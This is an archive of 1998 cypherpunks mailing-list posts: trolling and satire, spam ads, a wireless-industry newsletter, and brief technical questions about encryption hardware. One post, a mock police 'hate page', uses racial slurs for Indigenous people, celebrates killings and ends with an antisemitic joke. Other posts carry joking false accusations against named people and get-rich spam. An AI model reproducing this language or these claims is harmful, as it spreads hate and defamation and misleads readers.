Date: Thu, 9 Apr 1998 02:16:41 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Thanks for the mammaries...
Message-ID: <19980409091608.582.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


  First, I would like to express my appreciation for the
fact that every single subscriber to the cypherpunks
distributed mailing lists has chosen to participate in
the opening salvo (on April 19, 1998, 9:02 a.m.) of
the Digital Revolution.
  Unfortunately, I ratted you all out earlier today.
I'm sorry, but the Men In Really Dirty White threatened
to tell my mom, if I didn't confess. Although mom has 
been dead for quite some time, my knee-jerk programming
kicked in (pardon the pun).
  The good news is that I exposed Bill Gates as the
RingLeader of the highly illegal conspiracy of which
you are all a part, so at least you should have some
deep-pockets on your side when THEY (TM) kick in your door.

  I will be entering the Witless Projection Pogrom shortly,
so I suppose that there is no harm in revealing that my
original persona on the cypherpunks list, the one you
have all known me by for quite some time, is Blanc Weber.
  I'm sorry I've been deceiving you all with my various
Toto and TruthMonger personas, but during my volunteer
work at the Handle Institute, I was infected with 
Tourette Syndrome from a dirty needle (while *sewing*,
you cynical little cocksuckers!).

  I am also the one who has been sending the ASCII-art
spams to the list. Dimitri was completely innocent, and
you all should feel terrible about the way you treated
him.

  I know that all of the list subscribers will carry on
with the TRIN plan on April 19th because they are truly
committed to the violent overthrow of all governments,
and not just because I made it with all of you under the
guise of my Lynne Harrison persona.
(Personal note to Human Gus-Peter: No, I'm not wearing
 any panties...)

  I feel particularly bad about ratting out our Philosopher
King, Tim C. May, since he was such a great help to me
under his Dale Thorn and John Young personas.
  I also ratted out Adam Back for his part in the 
murder of Princess Diana, but it backfired when he was
secretly Knighted hours later, by the Queen Mother (No!
not John Gilmore, you fucking idiots!)

  Anyway, before signing off, I would like to inform you
that my real opinion of all of you who responded to my
Toto and TruthMonger posts is about the same as the
opinion of Billy Crystal (when he was on 'Soap') in
regard to all of the fucking idiots who finally connected
to the ClueServer, slapped themselves on the forehead,
and said, "What am I doing? I'm arguing with a *dummy*!"

It's been real...

Love & XXXX's,
Blanc Weber
"I'm not an asshole, but I play one in real life."


______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Thu, 9 Apr 1998 03:53:40 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Why no one has ever seen Toto and L.M. Boyd together... / [Fwd: L.M. Boyd E-mail Sampler Discontinued]
Message-ID: <352C9C60.30DE@dev.null>
MIME-Version: 1.0
Content-Type: text/plain

Gomez, Bianca, Toto, L.M. Boyd...--->YOU!


To: multiple recipients of <sampler@lmboyd.com>
Subject: L.M. Boyd E-mail Sampler Discontinued 
From: sampler-request@lmboyd.com
Date: Tue, 07 Apr 1998 13:29:31 -0700


**********************

The L.M. Boyd e-mail sampler has been discontinued. Thank you for your
interest and kind comment. It's much appreciated.

L.M. Boyd 
Crown Syndicate, Inc.

***********************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: press@1stpress.com
Date: Thu, 9 Apr 1998 04:45:30 -0700 (PDT)
To: press@1stpress.com
Subject: Was 475.00 NOW 99.00 read...
Message-ID: <199804091145.EAA22387@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Dear Business Owner:

If you are not happy with your web sales, we
have a GUARANTEED SUCCESS PACKAGE FOR YOU...
Plus THREE FREE BONUSES to Jump Start Your Sales...

**FREE Automated Web Site Listings (approx. 500)
**FREE Automated Web Site Analysis
**FREE 10 Point Success List
**FOUR New Web Site Addresses
**DOUBLE Your Investment Guarantee


******AND AT OVER 75% OFF NORMAL RATE****** 
BUT ONLY THRU April, 16th... NO EXCEPTIONS.

HOW THIS WILL WORK FOR YOU...

Internet sales will soar from 8 Billion today
to $300 Billion in the next five years. 

How can shoppers find you...and how to make sure
they buy from you? Do you have the 10 elements
for success? Do you have a powerful plan of attack
to stand out from the crowd?

Established on the web in 1994, our award-winning,
International Shopping Complex averages over 1.5 million
hits a month. We have a PROVEN success plan to add your 
business to our 4 high traffic locations.

We make it easy, VERY affordable, and **GUARANTEED**.

One Client's Sales doubled in a month.
One Client went from 0 overseas sales to 70% overseas sales.
One Client went from a small web page to their own server
with four employees taking orders from their computers.
One Client sold the rights to a country for their products.

  THE PLAN, BONUSES AND GUARANTEE...
 
  We mirror (copy) the first page of your existing
  web site and install it in our 4 shopping locations.
  The total traffic to these sites is over 1.5 million
  hits a month.

  We link back to the rest of your pages. Your
  current web pages are not changed in any way.
  (Our techs do all the work)

  It just makes common sense. Who becomes more visible,
  you with a total of five locations, or someone who
  just has one.

IN ADDITION TO YOUR FOUR NEW LOCATIONS, this package
includes...

  **THREE FREE BONUSES**

   FREE AUTOMATED LISTINGS.
   We give you the http:// of a site to fill out a form once
   for each of your new addresses (URLs). This is automated 
   software that will put each URL on av.130 different search
   engines/directories. This gives you immediately approx. 500
   new listings. Takes about 15 minutes per address).
   This will not only jump start your 4 new locations
   individually, you also take advantage of the
   "accidental shopper" - shoppers who were not looking
   for you to begin with, from the huge traffic to the malls.

   FREE SITE TO GET analysis of YOUR web site home page 
   including:
   An eye-opening evaluation on your site's performance,
   html output errors, spelling errors, Access download time, 
   popularity check.
 
   FREE SUCCESS CHECK LIST so you can
   see if you have the 10 elements for success on the Net.
   This is based on our knowledge of hundreds of products
   sold from our shopping complex, and is only available to
   our clients.

AND THE BEST GUARANTEE ON THE NET:
You must DOUBLE your investment in gross sales or you
get ANOTHER YEAR FREE.

This special package rate of $99.00 
only available thru April 16th, 1998. OVER 75% Discount 
from our 1998 rate card price of $475.00.

Just e-mail back for full no-obligation
details - Hit reply and type 75% SEND DETAILS in subject
line and we will rush email your information.
 -----------------------------------------------
 To be removed from any future mailings
 please reply with REMOVE in the subject line.
 Thank You
 -----------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sixfigures1@juno.com
Date: Thu, 9 Apr 1998 00:55:15 -0700 (PDT)
To: <cypherpunks-unedited@toad.com>
Subject: Make 6 Figure Income Working In Your Pajamas !!
Message-ID: <61185916_73597211>
MIME-Version: 1.0
Content-Type: text/plain




 Make 6 Figure Income Working In Your Pajamas !!

Each day I get out of bed, brush my teeth and walk into 
the next room to begin my work day..... Still in my PJs! 

And who am I working with, you ask. 
  
Well, my strategic partners are major corporations like:

   Netscape
   UUNet
   Oracle
   Sun Microsystems
   Worldcom (soon to be the 2nd largest phone 
             company after merging with MCI)
   Sprint Cellular
       ....Incredible names in the communications industry!!

The products and services from these corporations, which include Internet 
services, telecommunications services and unified messaging services, are 
targeted to the consumer, small office and home office (SOHO) markets.  
And there is even more coming in the next few months!

And NO, it does not cost the king's ransom to sign up.   How about $25?!!!

Want more info?   Reply with PAJAMAS in the subject.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GIC <infoservices@gkb.com>
Date: Thu, 9 Apr 1998 03:43:15 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: GKB FREE SERVICES UPDATE (4/98)
Message-ID: <199804091043.DAA21696@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Update on Global KnowledgeBase (http://gkb.com) free internet services. (4/98)


Dear gkb user,

Thanks to you, our campaign for Global KnowledgeBase (http://gkb.com) is 
continues to be a great success attracting more than 4000 unique users/daily.

Continue to Explore and Contribute to create the accumulated knowledge in gkb.com,
for the benefit of all.

To login to the GKB applications please use the gkb login as follows:

Your login ID : cypherpunks@toad.com 
GKB User Code : 4782

New features
============

Global Journal - The newest and most dynamic meduim to exchange internet 
knowledge, in Global Journal, you, the GKB user, have the opportunity to 
express your opinion, provide newsworthy internet links, or cite facts.

GlobalShop - best source of information on over 60,000 products listed, 
giving direct access to the price lists of the best known, compare prices, 
look for new models and benefit from special offers.

Build your e-commerce, integrate your own catalog in Global Shop for free.

Global Free - Explore and Contribute to the free Internet services knowledgebase

Web messaging - if you have an email address @gkb.com (which is free), explore your Email directly on the web.  

Personal&Email KB - If you are looking for users sharing the your area of interests, 
or simply email of users in your area.

GlobalChat - web based chat for all

The old and successful free features are always there.
=====================================================

Interactive Classifieds  - Free interactive classifieds segmented by marketplace 
and criteria (more than 8000 ads in Geneva area only)

Press Releases -  Free press release publication.

Business Guide  - Free  business internet site application

GlobalJob - Free job listing for companies, and free CV listing for individuals.

Business Opportunities - Free business opporrtunities publication by marketplace/industry

Free email addresses at gkb.com are always available.

Global Finance - gkb financial knowledgebase 

Global Events - free events listing in the events knowledgeBase


We hope you will find the new and old feature useful.

Regards

Gkb team






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: GIC <infoservices@gkb.com>
Date: Thu, 9 Apr 1998 03:43:08 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: GKB FREE SERVICES UPDATE (4/98)
Message-ID: <199804091043.DAA21689@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Update on Global KnowledgeBase (http://gkb.com) free internet services. (4/98)


Dear gkb user,

Thanks to you, our campaign for Global KnowledgeBase (http://gkb.com) is 
continues to be a great success attracting more than 4000 unique users/daily.

Continue to Explore and Contribute to create the accumulated knowledge in gkb.com,
for the benefit of all.

To login to the GKB applications please use the gkb login as follows:

Your login ID : cypherpunks@toad.com 
GKB User Code : 4782

New features
============

Global Journal - The newest and most dynamic meduim to exchange internet 
knowledge, in Global Journal, you, the GKB user, have the opportunity to 
express your opinion, provide newsworthy internet links, or cite facts.

GlobalShop - best source of information on over 60,000 products listed, 
giving direct access to the price lists of the best known, compare prices, 
look for new models and benefit from special offers.

Build your e-commerce, integrate your own catalog in Global Shop for free.

Global Free - Explore and Contribute to the free Internet services knowledgebase

Web messaging - if you have an email address @gkb.com (which is free), explore your Email directly on the web.  

Personal&Email KB - If you are looking for users sharing the your area of interests, 
or simply email of users in your area.

GlobalChat - web based chat for all

The old and successful free features are always there.
=====================================================

Interactive Classifieds  - Free interactive classifieds segmented by marketplace 
and criteria (more than 8000 ads in Geneva area only)

Press Releases -  Free press release publication.

Business Guide  - Free  business internet site application

GlobalJob - Free job listing for companies, and free CV listing for individuals.

Business Opportunities - Free business opporrtunities publication by marketplace/industry

Free email addresses at gkb.com are always available.

Global Finance - gkb financial knowledgebase 

Global Events - free events listing in the events knowledgeBase


We hope you will find the new and old feature useful.

Regards

Gkb team






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-wow-com-news-update@nmpinc.com
Date: Fri, 17 Apr 1998 15:00:24 -0700 (PDT)
Subject: Wireless News Update
Message-ID: <199804091815.NAA08688@Indy1.newmedium.com>
MIME-Version: 1.0
Content-Type: text/plain



 ======================================================
 This update is sponsored by Hughes Network Systems
   http://www.hns.com
 ======================================================

 CTIA's WOW-COM named a "TOP WEB SITE" by Mobile Computing &
 Communications Magazine (2/98)
 
 Dear WOW-COM Reader:
 
 WOW-COM(TM) is the wireless industry's online information source, a
 FREE service of CTIA.  The world of wireless is in constant motion.
 Stay on top of industry news and benefit from CTIA's analysis by
 reading http://www.wow-com.com everyday.
    
 If you wish to remove yourself from this mailing list, please
 send an email to <majordomo@nmpinc.com> with the following
 command in the body of your email message:
 
      	unsubscribe wow-com-news-update
 
 If you wish to get in contact with the owner of the list, (i.e.,
 if you have difficulty unsubscribing, or have questions about
 the list itself) please send email to 
 <owner-wow-com-news-update@nmpinc.com>.
 Thank you.
 
 INDEX:
 ======
 1) 	WIRELESS INDUSTRY SETS NEW GROWTH RECORD:
            11,270,301 NET SUBSCRIBER GROWTH IN 1997 
 2)	TELEPHONE INDUSTRY GROUPS JOIN IN ASKING FCC TO RESOLVE WIRETAP
             ISSUES
 3)	EMC CENTER TO HOLD SPECIAL WORKSHOP AT OKLAHOMA UNIVERSITY, MAY
            20-21 ON MEDICAL DEVICE IMMUNITY TESTING USING NEW ANSI C63.18
            STANDARD                                                
 4)	LOOKING FOR A JOB IN THE WIRELESS INDUSTRY?
   
 ***********WIRELESS JOB OPPORTUNITY OF THE WEEK***********
 
 http://www.wow-com.com/wworkplace/
   Company: Hughes Network Systems
   Job Title: 	Senior Digital Design Engineer - Hardware
   Location:  	Germantown, MD - US
   Job Description:   Lead digital design engineer for satellite
   baseband communications hardware.  Position requires experience in
   design of digital communications subsystems such as modulators,
   demodulators, digital filters, NCOs and FEC encoders/decoders.
   Requires BSEE (MSEE preferred) and 7-10 years of digital design
   experience with emphasis on communication circuit design.
 
**********************************************************************

 WIRELESS INDUSTRY SETS NEW GROWTH RECORD:
 11,270,301 NET SUBSCRIBER GROWTH IN 1997 
 ==========================================================
 
 http://www.wow-com.com/professional/whatshot
 "America's love affair with the wireless phone is as passionate as

 ever," observed Thomas E. Wheeler, President and CEO of the Cellular
 Telecommunications Industry Association (CTIA) in releasing the
 Association's latest Semi-Annual Data Survey.  As of December 31,
 1997, there were 55,312,293 wireless phone subscribers in the United
 States.  (CTIA estimates that there are nearly 58 million subscribers 
as of today's date.) This is a net growth of 11,270,301 subscribers-a 
12- month record. More people using wireless phones mean
that customer bills are down and company revenues are up.  Click link
above for the highlights!  
 ==========================================================
 
 TELEPHONE INDUSTRY GROUPS JOIN IN ASKING FCC TO RESOLVE WIRETAP ISSUES
 
 http://www.wow-com.com/results/professional/news/
 The major telecommunications associations in the United States have
 joined together to ask the Federal Communications Commission to
 resolve the dispute between the industry and the Federal Bureau of
 Investigation over new wiretap requirements. The industry groups are
 committed to assisting law enforcement agencies in carrying out all
 court-ordered wiretaps, but they argue that the FBI is requesting
 surveillance capabilities that go beyond the law.
 ==========================================================
 
 EMC CENTER TO HOLD SPECIAL WORKSHOP AT OKLAHOMA UNIVERSITY, MAY 20-
 21 ON MEDICAL DEVICE IMMUNITY TESTING USING NEW ANSI C63.18 STANDARD
 
 
 http://www.wow-com.com/professional/whatshot
 The University of Oklahoma Center for the Study of  Wireless EMC has
 announced that it will conduct a special workshop on testing RF
 immunity of medical devices to be held at the Norman Campus on May
 20-21. Attendance is limited and registrations are on a first-come,
 first-served basis.  The two-day seminar, which includes a field trip
 to a local hospital, will focus on using the new ANSI C63.18 Standard,
 "Recommended Practice for an On-Site, Ad Hoc Test
  Method for Estimating Electromagnetic Immunity of Medical Devices to
 Specific
  Radio-Frequency Transmitters". 
 ==========================================================
 
 http://www.wow-com.com/wworkplace/
 Join thousands of other wireless professionals searching for the
 perfect wireless job opportunity by logging on to CTIA's Career
 Center.  This free online career service offers wireless industry
 employment opportunities and information on leading wireless
 employment and professional placement services.  The Career Center is
 global, offering international job listing and direct access to the
 global wireless workplace.  Click above to find your next wireless job
 opportunity! 
 =============================
 MORE WOW-COM(TM) FEATURES
 =============================
 WOW-COM(TM) is current: Routine Updates throughout the business day 
 WOW-COM(TM) is insightful: CTIA's unbiased analysis 
 WOW-COM(TM) is beneficial: Find products and services in
 WOW-COM(TM)'s Virtual Trade Show. List open positions in the
 WOW-COM(TM) Career
 Center, receive resumes via email and hire qualified individuals.
 ========================================================
 This update sponsored by: HUGHES NETWORK SYSTEMS
 
 http://www.hns.com/
 
 http://www.joinhns.com
 Hughes Network Systems is one of the fastest-growing digital
 communications companies in the world, providing world-class wireless,
 satellite and broadcast products to customers in over 60 countries.
 Today, HNS employs over 500 software engineers and 200 hardware
 engineers dedicated to developing our products, services and systems
 from our Germantown, Maryland headquarters and San Diego, California
 facility. Click above to learn more.
 
 HNS HOT JOBS CAREER INVITATIONAL. On Saturday, April 25, Hughes
 Network Systems (HNS) is hosting a Hot Jobs Career Invitational at our
 facility in Gaithersburg, Maryland (metro Washington, DC). For this
 1-day event, we're bringing in the best the industry has to 
 offer to meet with our Hiring Managers. Interview expenses will be
 paid for qualified candidates.
 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Apr 1998 10:55:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: NSA Report on Crypto Risks
Message-ID: <199804091755.NAA32193@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


Federal Computer Week <www.fcw.com> of April 6
lists an article by Heather Harreld, "An NSA report 
details the risks of encryption technology," which is not
available online. 

So far Ms. Harreld has not responded to a request
for a copy, so if someone has a hardcopy we'd be 
grateful for a fax:

Fax: 212-799-4003.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stuart Johnson <stuartj@packetengines.com>
Date: Thu, 9 Apr 1998 15:15:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: ethernet encryption
Message-ID: <9209B012C2BBD111B6490008C728874C0EFACE@STEAM>
MIME-Version: 1.0
Content-Type: text/plain


hello all,

  i'm currently looking for a box or chipset that will encryption
ethernet traffic at or near wire speed. does anyone know of such a
thing?  anyhelp will be greatly appreciated.

  i'm not currently subscribed to cypherpunks so send any replies to me
at the email address below.

  thanks,
 ___________________________________________________
 Stuart Johnson			stuartj@packetengines.com
 Asic Design Engineer	Phone : (509) 777-7208
 Packet Engines Inc.		leading the Gigabit Ethernet revolution
 ___________________________________________________
 Key ID				: B65F9B8D
 Key Fingerprint		: F97D84A61C732CBAA1DA50A8D41963
 A BIG PRIME		:  2^3,021,377-1
 ___________________________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Thu, 9 Apr 1998 17:58:53 -0700 (PDT)
To: camcc@mindspring.com
Subject: Guilty by definition...
Message-ID: <352D6F28.1592@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


A poor fool who didn't realize that he had sealed his
own fate by responding to someone who had already 
ratted him out for a shot of Scotch with a beer
chaser wrote:

>For God's sake, another key; I'm gonna need a separate 
>floppy to track just you keys.

>But it's worth it; we bros.

Official Law Enforcement Dictionary

bro - 1. Co-conspirator 2. Accessory 3. Poor bastard
  who just fell in with the wrong company, and will
  probably spend the rest of his life in prison as
  a result of innocently replying to a UCE email
  titled, "How To Make Big $$$ At Home, Licking
  Your Own Nuts."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 9 Apr 1998 17:17:42 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Secure Cell Phones for State
Message-ID: <199804100017.UAA08863@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


U.S. State Dept Press Briefing today:

Briefer: James Rubin

Now, I have a piece of show-and-tell for you, which I do rarely around
here.  But I thought this was interesting enough, even for you cynical
and jaded journalists.  This is a secure cell phone.  Lieutenant General
Kenneth Minihan, Director of the National Security Agency, presented
Secretary Albright with a bank of Motorola Cipher-Tac 2000 security
modules to provide secure cellular communications.

This state of the art secure voice cellular technology will offer the
highest level of security wherever and whenever the Secretary and her
top advisors need to protect their communications.  So when you see us
carrying this beast around, rather than the slim-line phones we usually
like to use, you'll know that's because we're trying to have a secure
call.  That is not only for the obvious good reason that we want to make
sure nobody is interfering, but we also want to make sure that nobody is
making transcripts and passing them around for a variety of perfidious
reasons.

So this here is the original, first secure cell phone to be delivered to
Secretary Albright, and we thought you guys might get a kick out of
that.

-----

Would anyone know the security technology of this unit and its support
system? And how it compares to those of competitors in the US and 
outside?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@nsm.htp.org
Date: Thu, 9 Apr 1998 13:44:27 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Wristwatch PC
Message-ID: <19980409204339.463.qmail@nsm.htp.org>
MIME-Version: 1.0
Content-Type: text/plain


Another article for Decoder-Ring-punks

http://dailynews.yahoo.com/headlines/technology/story.html?s=z/reuters/980408/tech/stories/seiko_1.html
www.seiko.com   Cool pictures at www.ruputer.com

Seiko Instruments Says To Sell First Wristwatch PC

TOKYO (Reuters) - Seiko Instruments said today it would begin selling
wristwatch personal computers (PCs) in Japan on June 10.

It said the new product would be the world's first wearable PC.

A company statement said the watch, called the Ruputer, can download
data that includes text and pictures from other personal computers.

The wristwatch PCs will be sold with three software applications that
run on Microsoft Windows 95 operating system, it said.

Watches come equipped with a 16-bit central processing unit and 128
kilobytes of main memory, it said.

Games can be played on the products and they can exchange data with
each other via infrared signals, it said.

The company will launch two Ruputer models with retail prices of
38,000 yen and 48,000 yen, the statement said.

A company spokeswoman said it aimed to sell 100,000 of the watches in
the first year. Seiko Instruments is a group firm of watch wholesaler
Seiko.
-------------------------
Seiko Instruments
                                                                         announced that it would begin selling
                                                                         Ruputer wristwatch personal
                                                                         computers in Japan on June 10th.
                                                                         No announcement was made about
                                                                         North American distribution.

                                                                         Although I have not received the
                                                                         release Ruputer specifications I
                                                                         believe the LCD screen is
                                                                         102 by 62 (#1), an IR port (#2) or cable
                                                                         interface (#3) is available. The tiny
                                                                         Ruputer has 128 k of RAM, 512 k of
                                                                         ROM and up to 2 MB of storage!

                                                                         The Ruputer Web site is in Kanji
                                                                         (Japanese) with a little English with
                                                                         many illustrations, an English site has
                                                                         been requested. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Thu, 9 Apr 1998 19:56:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dudley DoRightMonger Driven From Home By Armed Thugs?
Message-ID: <352D8AFE.483E@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Poor Dudley seems to have been evicted from his spiritual home at
http://www3.sk.sympatico.ca/carljohn/rcmphate/rcmphate.html .

As a matter of fact, the whole http://www3.sk.sympatico.ca/carljohn
website seems to have mysteriously disappeared into thin air, for
no apparent reason.
Since the nice people at Sympatico have never shown any propensity
for fascist oppression of their users, as far as I know, I fear that
perhaps they have fallen victim to the Dangerous Armed Thugs who
have stolen my computer and my cute little nephew's computer.
(Of course, I don't have any firsthand knowledge that the Armed Thugs
 are truly responsible for theft of my nephew's computer, since 
 whoever the thief was who stole it, like most criminals, failed to
 leave any sign of his/her presence except for the obvious violation
 of my privacy. Thus I am assuming that perhaps the devious, criminal
 ordinary citizens who informed me of the intrusion of the Dangerous
 Armed Thugs into my home were not just lying through their teeth,
 as Judges always rule they do when their testimony and broken bones
 are in conflict with the Official Version Of The Truth (TM) told by
 the Dangerous Armed Thugs.)

I certainly hope that the nice Sympatico people weren't threatened by
the Dangerous Armed Thug who robbed me at gunpoint, on behalf of a
drug-dealing car thief and violent armed robber. I fear that this may
be the case, however, since they have never contacted me to express
any concerns about the webpages where I store works I have authored,
and portions of works in progress.

I suppose that the Dangerous Armed Thugs backed up their veiled threats
of violence with outrageously blatant Lies such as those that poured
forth in huge torrents from the Evil Lying Mouths of the Costumes Offals
at the Regway, SK, meatspace border crossing when they stole my laptop
and other possessions without being able to offer any explaination as
to why they were doing so, other than the unspoken and obvious fact
that they are Dangerous Armed Thugs and I am just a Piece Of Shit
Citizen who is expected to fucking well take whatever they choose to
dish out to me, without resistance.

I suppose that the best thing I can do with Dudley DoRightMonger
is to help him to flee to the Soviet Union, where the Armed Thugs
are less dangerous because they are freelancers, and can be bought
by both the government *and* the citizens. (True Free Enterprise!)
Thank Dog that there are still places like Russia, where free 
speech is still possible, and where the creative juices of the
muse can still flow freely, out of the reach of the Violent
Dangerous Armed Thugs in Canada who stand ready and willing to
oppress and murder anyone who looks or acts differently than
themselves.

I guess if I was a Wagon-Burner, I would already be dead...

TruthMonger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Thu, 9 Apr 1998 20:03:02 -0700 (PDT)
To: fygrave@freenet.bishkek.su
Subject: Please let Dudley sleep under your roof for a while...
Message-ID: <352D8C1D.5141@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


                               The Official

                       Royal Canadian Mounted Police

                                 HATE Page

Kudos of the week go to Constable Dave Voller, who legally murdered a
gun-toting Wagon-Burner and the nine year old future glue-sniffer clinging
to her skirt.

Congrats, Dave. A hundred points for the woman, and five hundred for the
kid...

This is a good time to remind RCMP Officers across Canada that, despite our
long history of exercising a strong hand (and an even stronger nightstick
;?) in keeping the Wagon-Burners from storming the gates of white society,
current social and legal trends make it necessary for us to take every step
necessary to cover our ass when we take those measures needed to keep them
in their proper physical place (the reservation) and to keep them in their
proper attitudinal place even when they remain in their proper physical
place.

Remember that the procedures that we have put in place are for your
protection, and that if you stay within our guidelines, you can pretty much
waste as many Wagon-Burners as you wish, without suffering legal
consequences.

Constable Voller followed proper procedure in charging right into a
volatile situation with no backup, so that there would be no possibility of
conflicting stories from other officers invited to participate in the
adrenaline high involved.
He also had the foresight to waste the bitch with a shotgun, so that a wide
enough target area would be covered to take care of any potential witnesses
whose stories would not be subject to government pressure as to their
content.

Rest assured that if you murder a Wagon-Burner according to proper
procedure, that the members we claim not to be able to spare to supervise a
potentially deadly encounter with Wagon-Burners will suddenly become
available to pore over the murder site and absolve you of any wrongdoing.
A host of spin-doctors will also suddenly appear to remind the head
Wagon-Burners that 'good relations' with the Federal Government are
conditional on 'going along to get along.'

The RCMP Officers of the Wild, Wild West continue to lead the way in
keeping the Wagon-Burners constantly on the run, no matter how far they run
to try to escape.

The Estevan Detachment of the RCMP is living up to their long tradition of
effectively using other arms of law enforcement to effectively harass
Wagon-Burners while using a minimum of Federal resources.

You undoubtedly remember last year's article about the member of the City
of Estevan Police Department who was successful in getting the courts to
uphold his own brand of Frontier Justice for decades, until he made the
mistake of using a 'real' informant, thus making his cases vulnerable to
conflicting testimony as to his questionable activities.
As we reported, the prosecutor was able to railroad a couple of kids who
were represented by incompetent legal aide lawyers, by having the arresting
officer help to mentally muscle them outside the presence of legal counsel,
but the #1 Wagon-Burner on the local yokel's list was not able to be
railroaded at that time.

We reported with pride on the Estevan Detachment of the RCMP helping that
same local officer to once again set up the Wagon-Burner by helping in the
operation while staying out of the main action, so that the Wagon-Burner
and his White-Whore Wife were financially broken to the point where they
had to cop a plea.
Due to the Estevan Detachment's foresight, they didn't "get any on 'em"
when the local yokel finally got his chain yanked on bogus grounds that
protected the City of Estevan from taking any responsibility for his years
of abuse of authority.

To bring you up to date, not only is the Wagon-Burners oldest little
glue-sniffer currently being railroaded on criminal charges, but the
Estevan RCMP are once again setting a fire under the Wagon-Burner's ass by
supporting the Provincial Game Warden's persecution of the Wagon-Burner for
daring to hunt on the land that we stole from him, once again saving
Federal dollars from having to be used to finance their dirty work.

Today's Humor:

"First they came for the Wagon-Burners, but I was not a Wagon-Burner, so I
didn't speak up. Then they came for the Revisionists, but I was not a
Revisionist, so I didn't speak up. Then they came for the Freedom of Speech
Advocates, but I was not a Freedom of Speech Advocate, so I did not speak
up.
"Then they came for the Jews, and I got to put pepper-spray in their
Jesus-Killing eyes..."
~ Constable Hettinga
"I *love* this country!"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Salvatore A. Ingaro" <s_sal@bellsouth.net>
Date: Thu, 9 Apr 1998 18:35:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: join
Message-ID: <352D7761.4E44@bellsouth.net>
MIME-Version: 1.0
Content-Type: text/plain


join




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: YAY383 <YAY383@aol.com>
Date: Thu, 9 Apr 1998 19:42:48 -0700 (PDT)
Subject: hi
Message-ID: <900b7401.352d7c15@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

 


To: YAY383@aol.com
Subject: hi
From: YAY383 <YAY383@aol.com>
Date: Thu, 9 Apr 1998 19:57:25 EDT
Organization: AOL (http://www.aol.com)

<a href="http://members.xoom.com/bighooker/index.html">Click Here For 10 Free
Pics</a>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: TruthMonger <tm@dev.null>
Date: Thu, 9 Apr 1998 22:07:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Ignorance of the Law is No Excuse
Message-ID: <352DA9F3.3711@dev.null>
MIME-Version: 1.0
Content-Type: text/plain


Favorite Courtroom Scene #137:

A debate arises over the 'proper interpretation' of a particular law,
or section of the law.
None of the legal eagles with decades of experience in the study and 
practice of the law can agree, so the Judge orders a break in the 
action, whereupon everyone dives into mountains of information 
contained in both fresh and dusty graven tablets and eventually they
all return to the courtroom to further disagree as to what constitutes
obeying the law, and what constitutes a violation of the law.
  Finally, the judge makes a decision (which may be confirmed or
overturned in the future by other people with even more years of
study and experience in the practice of law) and the defendant
becomes an innocent lamb or a fire-breathing devil, according to
the judgement.

  The beautiful insanity of the preceeding is only fully manifested
when the defendant protests that he hadn't really meant to transgress
against the law of the land, and the Judge, who based her final
decision on a single line of legislation enacted in 1854, and not
noticed nor referenced since the day it was passed, tells the
defendant that "Ignorance of the law is no excuse."

[Note: If you are unaware of whether the law in Moose Jaw,
 Saskatchewan, requiring pedestrians to walk on the 'right'
 side of the sidewalk, was or was not recinded, then your 
 qualify as a member of the 'criminal element,' in potential,
 if not in fact.]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: RCMP HateMailer <rcmp@dev.null>
Date: Fri, 10 Apr 1998 00:08:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Official RCMP HateMailer Launched
Message-ID: <199804100709.BAA29309@harrier.sasknet.sk.ca>
MIME-Version: 1.0
Content-Type: text/plain


[Bienfait Nutly News]Dangerous Armed Thugs sitting in parked cars hiding
in the alley behind the CoalDust Saloon, waiting to tax the citizens
under the obscenely low breath-alcohol laws in place, celebrated the
launching of the 'Official RCMP HateMailer' after the sudden and 
mysterious disasppearance of the 'Official RCMP Hate Page' at a
Sympatico website.
The unusually high number of vehicles and officers hanging around the
small Saskatchewan town was attributed to a 24-hour watch on the
former host of the vanished webpage, in the hope of catching him
walking on the left side of the sidewalk and arresting him under
authority of a law which applied only to Moose Jaw, Saskatchewan,
when it was in force, and was recinded years ago.
"We weren't notified of the recinding of the law." one of the waiting
constables stated, smiling like a banshee.

